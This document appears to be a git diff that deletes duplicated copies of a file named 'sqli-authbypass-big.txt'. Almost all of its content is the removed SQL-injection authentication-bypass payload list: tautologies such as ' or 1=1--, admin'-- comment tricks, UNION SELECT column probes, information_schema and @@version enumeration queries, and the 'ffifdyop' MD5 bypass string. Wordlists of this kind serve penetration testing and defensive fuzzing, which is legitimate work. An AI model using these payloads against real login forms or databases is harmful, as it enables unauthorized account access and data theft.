-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1).txt b/src/images/sqli-authbypass-big (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1).txt b/src/images/sqli-authbypass-big (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
